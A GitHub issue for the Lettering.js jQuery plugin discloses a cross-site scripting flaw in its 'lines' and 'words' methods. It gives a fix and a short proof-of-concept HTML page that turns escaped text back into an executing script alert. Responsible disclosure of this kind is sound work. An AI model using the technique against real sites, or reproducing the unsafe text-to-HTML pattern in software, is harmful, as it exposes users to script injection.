Lettering.js icon indicating copy to clipboard operation
Lettering.js copied to clipboard
verified publisher icon davatron5000

Security issue: XSS for methods 'lines' and 'words'

Open pcworld opened this issue 5 years ago • 0 comments

The injector first extracts the DOM text representation, then inserts it into HTML: https://github.com/davatron5000/Lettering.js/blob/d06bb733823a6fa76e11a09d24849d066a1566aa/jquery.lettering.js#L20 Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS). This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.

pcworld avatar Apr 19 '20 22:04 pcworld